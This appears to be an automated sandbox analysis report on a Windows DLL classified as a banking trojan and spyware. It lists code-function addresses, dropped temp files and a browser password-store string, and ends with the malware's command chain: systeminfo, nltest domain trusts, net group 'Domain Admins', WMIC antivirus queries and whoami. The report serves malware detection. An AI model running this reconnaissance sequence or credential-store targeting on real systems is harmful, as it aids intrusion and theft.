            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D7CEB03_2_00007FF8A8D7CEB0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D56E843_2_00007FF8A8D56E84
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D41E903_2_00007FF8A8D41E90
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D72E903_2_00007FF8A8D72E90
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D19E643_2_00007FF8A8D19E64
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8CFAF203_2_00007FF8A8CFAF20
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D070EC3_2_00007FF8A8D070EC
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D061E03_2_00007FF8A8D061E0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8DD01A43_2_00007FF8A8DD01A4
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D2C1803_2_00007FF8A8D2C180
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D250F83_2_00007FF8A8D250F8
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D322D43_2_00007FF8A8D322D4
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D722003_2_00007FF8A8D72200
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D7C3D03_2_00007FF8A8D7C3D0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D1C3A83_2_00007FF8A8D1C3A8
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D2530C3_2_00007FF8A8D2530C
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D053203_2_00007FF8A8D05320
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8DB94703_2_00007FF8A8DB9470
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D0B5603_2_00007FF8A8D0B560
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8DD85543_2_00007FF8A8DD8554
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D1D6983_2_00007FF8A8D1D698
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D746A03_2_00007FF8A8D746A0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D076803_2_00007FF8A8D07680
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8DCD6703_2_00007FF8A8DCD670
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8DDC6383_2_00007FF8A8DDC638
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D4D6043_2_00007FF8A8D4D604
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D737C03_2_00007FF8A8D737C0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D757803_2_00007FF8A8D75780
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8CFC8783_2_00007FF8A8CFC878
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8CFA83C3_2_00007FF8A8CFA83C
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8DE58343_2_00007FF8A8DE5834
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC8CBE03_2_000001CEAFC8CBE0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC913A33_2_000001CEAFC913A3
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC92BB03_2_000001CEAFC92BB0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC9FBC03_2_000001CEAFC9FBC0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFCA2F603_2_000001CEAFCA2F60
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC7A7303_2_000001CEAFC7A730
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFCA1F403_2_000001CEAFCA1F40
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC8BED03_2_000001CEAFC8BED0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC966E03_2_000001CEAFC966E0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC816A03_2_000001CEAFC816A0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC842A03_2_000001CEAFC842A0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC982A03_2_000001CEAFC982A0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC766C03_2_000001CEAFC766C0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFCA02103_2_000001CEAFCA0210
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC972203_2_000001CEAFC97220
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC799D03_2_000001CEAFC799D0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC9B5E03_2_000001CEAFC9B5E0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC955E03_2_000001CEAFC955E0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC84DB03_2_000001CEAFC84DB0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC855C03_2_000001CEAFC855C0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC945503_2_000001CEAFC94550
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC75D603_2_000001CEAFC75D60
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC891203_2_000001CEAFC89120
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC8B4E03_2_000001CEAFC8B4E0
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC795003_2_000001CEAFC79500
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFC8A1003_2_000001CEAFC8A100
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFCA14903_2_000001CEAFCA1490
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001CEAFCA28123_2_000001CEAFCA2812
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000276196391204_2_0000027619639120
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000276196295004_2_0000027619629500
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000002761963A1004_2_000002761963A100
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000002761963B4E04_2_000002761963B4E0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000027619634DB04_2_0000027619634DB0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000027619625D604_2_0000027619625D60
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000276196445504_2_0000027619644550
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000276196528124_2_0000027619652812
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000002761963CBE04_2_000002761963CBE0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000002761964FBC04_2_000002761964FBC0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000276196514904_2_0000027619651490
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000002761962A7304_2_000002761962A730
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000276196466E04_2_00000276196466E0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000276196266C04_2_00000276196266C0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000002761963BED04_2_000002761963BED0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000276196413A34_2_00000276196413A3
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000027619642BB04_2_0000027619642BB0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000027619652F604_2_0000027619652F60
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000027619651F404_2_0000027619651F40
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000276196472204_2_0000027619647220
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000276196502104_2_0000027619650210
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000276196455E04_2_00000276196455E0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000002761964B5E04_2_000002761964B5E0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000276196355C04_2_00000276196355C0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000276196299D04_2_00000276196299D0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000276196316A04_2_00000276196316A0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000276196342A04_2_00000276196342A0
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000276196482A04_2_00000276196482A0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FBB2F606_2_000002339FBB2F60
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FBAFBC06_2_000002339FBAFBC0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FBA2BB06_2_000002339FBA2BB0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FBA13A36_2_000002339FBA13A3
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FBA66E06_2_000002339FBA66E0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FBB1F406_2_000002339FBB1F40
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FB8A7306_2_000002339FB8A730
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FB9BED06_2_000002339FB9BED0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FB866C06_2_000002339FB866C0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FB916A06_2_000002339FB916A0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FB942A06_2_000002339FB942A0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FBA82A06_2_000002339FBA82A0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FBB02106_2_000002339FBB0210
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FBAB5E06_2_000002339FBAB5E0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FBA55E06_2_000002339FBA55E0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FBA72206_2_000002339FBA7220
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FB85D606_2_000002339FB85D60
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FB899D06_2_000002339FB899D0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FB955C06_2_000002339FB955C0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FB94DB06_2_000002339FB94DB0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FB9A1006_2_000002339FB9A100
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FB895006_2_000002339FB89500
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FB9B4E06_2_000002339FB9B4E0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FBA45506_2_000002339FBA4550
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FB991206_2_000002339FB99120
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FBB14906_2_000002339FBB1490
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FBB28126_2_000002339FBB2812
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000002339FB9CBE06_2_000002339FB9CBE0
            Source: C:\Windows\explorer.exeCode function: 8_2_030321648_2_03032164
            Source: C:\Windows\explorer.exeCode function: 8_2_03031A7C8_2_03031A7C
            Source: C:\Windows\explorer.exeCode function: 8_2_03031A8C8_2_03031A8C
            Source: C:\Windows\explorer.exeCode function: 8_2_08381A7C8_2_08381A7C
            Source: C:\Windows\explorer.exeCode function: 8_2_08381A8C8_2_08381A8C
            Source: C:\Windows\explorer.exeCode function: 8_2_083821648_2_08382164
            Source: C:\Windows\explorer.exeCode function: 8_2_08851A8C8_2_08851A8C
            Source: C:\Windows\explorer.exeCode function: 8_2_08851A7C8_2_08851A7C
            Source: C:\Windows\explorer.exeCode function: 8_2_088521648_2_08852164
            Source: C:\Windows\explorer.exeCode function: 8_2_0E454B508_2_0E454B50
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4E97088_2_0E4E9708
            Source: C:\Windows\explorer.exeCode function: 8_2_0E46FE388_2_0E46FE38
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4B1ECC8_2_0E4B1ECC
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4E0EC08_2_0E4E0EC0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4A7EE88_2_0E4A7EE8
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4EAE848_2_0E4EAE84
            Source: C:\Windows\explorer.exeCode function: 8_2_0E45BEB88_2_0E45BEB8
            Source: C:\Windows\explorer.exeCode function: 8_2_0E499F688_2_0E499F68
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4CAF208_2_0E4CAF20
            Source: C:\Windows\explorer.exeCode function: 8_2_0E457FD08_2_0E457FD0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E47FC728_2_0E47FC72
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4B7C148_2_0E4B7C14
            Source: C:\Windows\explorer.exeCode function: 8_2_0E459CBC8_2_0E459CBC
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4C5D688_2_0E4C5D68
            Source: C:\Windows\explorer.exeCode function: 8_2_0E480D188_2_0E480D18
            Source: C:\Windows\explorer.exeCode function: 8_2_0E48EDE08_2_0E48EDE0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4A8DF88_2_0E4A8DF8
            Source: C:\Windows\explorer.exeCode function: 8_2_0E479D948_2_0E479D94
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4E9D948_2_0E4E9D94
            Source: C:\Windows\explorer.exeCode function: 8_2_0E480A8A8_2_0E480A8A
            Source: C:\Windows\explorer.exeCode function: 8_2_0E49EA848_2_0E49EA84
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4C0B548_2_0E4C0B54
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4D2B388_2_0E4D2B38
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4DDB348_2_0E4DDB34
            Source: C:\Windows\explorer.exeCode function: 8_2_0E49BB948_2_0E49BB94
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4EEBB88_2_0E4EEBB8
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4B78748_2_0E4B7874
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4A481C8_2_0E4A481C
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4888248_2_0E488824
            Source: C:\Windows\explorer.exeCode function: 8_2_0E48D8348_2_0E48D834
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4DD8B88_2_0E4DD8B8
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4C98B08_2_0E4C98B0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4E49408_2_0E4E4940
            Source: C:\Windows\explorer.exeCode function: 8_2_0E45D9E48_2_0E45D9E4
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4C89808_2_0E4C8980
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4796508_2_0E479650
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4DD63C8_2_0E4DD63C
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4757688_2_0E475768
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4C672C8_2_0E4C672C
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4677E08_2_0E4677E0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4B87888_2_0E4B8788
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4A74488_2_0E4A7448
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4AE45C8_2_0E4AE45C
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4C24308_2_0E4C2430
            Source: C:\Windows\explorer.exeCode function: 8_2_0E49F4C48_2_0E49F4C4
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4B84D88_2_0E4B84D8
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4D94F08_2_0E4D94F0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4B34988_2_0E4B3498
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4705408_2_0E470540
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4585688_2_0E458568
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4B45648_2_0E4B4564
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4C55348_2_0E4C5534
            Source: C:\Windows\explorer.exeCode function: 8_2_0E45453C8_2_0E45453C
            Source: C:\Windows\explorer.exeCode function: 8_2_0E49B5D08_2_0E49B5D0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4B05FC8_2_0E4B05FC
            Source: C:\Windows\explorer.exeCode function: 8_2_0E47F5FB8_2_0E47F5FB
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4805A08_2_0E4805A0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4563588_2_0E456358
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4DB3708_2_0E4DB370
            Source: C:\Windows\explorer.exeCode function: 8_2_0E45E31C8_2_0E45E31C
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4983EC8_2_0E4983EC
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4C73A08_2_0E4C73A0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4BA0488_2_0E4BA048
            Source: C:\Windows\explorer.exeCode function: 8_2_0E48E0748_2_0E48E074
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4560788_2_0E456078
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4AF0188_2_0E4AF018
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4760388_2_0E476038
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4970C08_2_0E4970C0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4C01548_2_0E4C0154
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4B01148_2_0E4B0114
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4C41348_2_0E4C4134
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4B11CC8_2_0E4B11CC
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4851C08_2_0E4851C0
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4801FB8_2_0E4801FB
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4A318C8_2_0E4A318C
            Source: C:\Windows\explorer.exeCode function: 8_2_0E46D19C8_2_0E46D19C
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FF8A8DC9868 appears 296 times
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FF8A8D0F210 appears 62 times
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FF8A8DC9670 appears 61 times
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FF8A8D0C6C0 appears 198 times
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FF8A8D0ECA0 appears 394 times
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FF8A8CFE038 appears 69 times
            Source: C:\Windows\explorer.exeCode function: String function: 0E477D54 appears 31 times
            Source: C:\Windows\explorer.exeCode function: String function: 0E45E160 appears 147 times
            Source: C:\Windows\explorer.exeCode function: String function: 0E45D5A8 appears 35 times
            Source: C:\Windows\explorer.exeCode function: String function: 0E45D6E8 appears 52 times
            Source: wait.dll.dllBinary or memory string: OriginalFilenamenvsvc32.exez- vs wait.dll.dll
            Source: classification engineClassification label: mal100.spre.bank.troj.spyw.evad.winDLL@70/7@7/4
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D7CB80 LoadLibraryW,GetLastError,swprintf,FormatMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,LocalFree,FreeLibrary,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF8A8D7CB80
            Source: C:\Windows\System32\rundll32.exeCode function: 3_3_00007DF4A9FC0000 CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,3_3_00007DF4A9FC0000
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D2C180 CoCreateInstance,StringFromGUID2,RegQueryInfoKeyW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegCloseKey,3_2_00007FF8A8D2C180
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8CFEA34 LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,3_2_00007FF8A8CFEA34
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\stkm[1].binJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03
            Source: C:\Windows\System32\rundll32.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5412:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1776:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3948:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2568:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4276:120:WilError_03
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\Iyufla1.tmpJump to behavior
            Source: wait.dll.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\wait.dll.dll,Jump
            Source: Iyufla1.tmp.8.dr, Alakow3.tmp.8.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\wait.dll.dll"
            Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1
            Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\wait.dll.dll,Jump
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1
            Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",Jump
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net view /all /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net view /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
            Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net config workstation
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net config workstation
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c whoami /groups
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
